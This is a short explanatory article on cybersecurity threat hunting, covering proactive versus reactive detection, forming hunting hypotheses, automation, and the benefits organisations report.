Threat hunting is when security professionals look for threats that are already in their organization’s IT environment. It is a process of proactively searching through networks in pursuit of attacks and evidence that attackers leave behind.
Proactive vs Reactive
In a nutshell, Threat hunting is about taking a proactive vs a reactive approach to identifying incidents.
Reactive approach involves responding to incidents that have already happened. When the organization’s incident response team gets notified of an alert and reactively responds to it.
Proactive approach involves preemptively identifying and addressing security weaknesses and threats before an attack takes place. When the incident response team is actively in search of malicious activity based on experience, the pattern of events, or simply hunches.
Building a threat hunting capability
Before starting a hunt, make sure you have the processes in place to respond efficiently. That is to make sure your team has effective responses prepared and can execute mitigation, remediation, and recovery phases effectively
Generating a Hunting Hypothesis
To generate a hypothesis you need to start with asking questions; such as “What is a vital company asset?”, “How would someone try to access it?” etc. In a previous post, we explained how to generate a hunting hypothesis in detail. Generating a hypothesis can lead to a more effective threat hunt
The diverse scope of Data
A good hunt team should be able to use a basic indicator in various ways while hunting. The more approaches a team has for aggregating data, the better their chances of threat hunting. Successful hunt teams have a multitude of technologies available to identify different types of activity in different ways
Scalability & Automation
The most important aspect of hunting is proving true negative. In other words, to prove that nothing bad exists. However, it is impossible to be completely sure you’re digging deep enough.
To oppose such problems, you need to hunt efficiently and widely. This requires a combination of scalability and automation. Automation can apply these same strategies and tactics. Through automation, you can scale up threat hunting so that a vast number of events are examined in a fraction of the time required by humans
Beginning a hunt
To conduct a threat hunting exercise, you first need to decide whether to use an internal security team or an external threat hunting service provider. Your threat hunting team should start by evaluating internal projects and resources to determine which are most valuable and begins hunting.
The Benefits of Threat Hunting
Many companies are still struggling with installing a threat hunting program; those who have succeeded, however, have reported significant benefits.
- Speed and accuracy of response
- Attack surface exposure / hardened network and endpoints
- Reducing dwell time (infection to detection)
- Time to containment (detect/prevent the spread or lateral movement)
- Amount of actual breaches based on the number of incidents detected
- Exposure to external threats
- Resources (e.g., staff hours, expenses) spent on response
- Reducing frequency/Number of malware infections